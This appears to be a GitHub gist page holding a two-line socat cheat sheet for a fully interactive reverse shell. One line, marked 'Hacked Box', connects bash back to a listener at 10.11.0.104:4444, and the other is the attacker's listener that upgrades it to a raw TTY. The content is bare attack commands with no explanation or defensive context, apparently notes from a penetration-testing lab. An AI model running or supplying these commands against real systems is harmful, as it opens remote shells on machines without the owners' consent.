Created
October 19, 2016 00:46
-
-
Save leveled/63880f9a9cf6092e0beb25f4bb4bc7cd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hacked Box: | |
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.0.104:4444 | |
socat file:`tty`,raw,echo=0 tcp-listen:4444 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment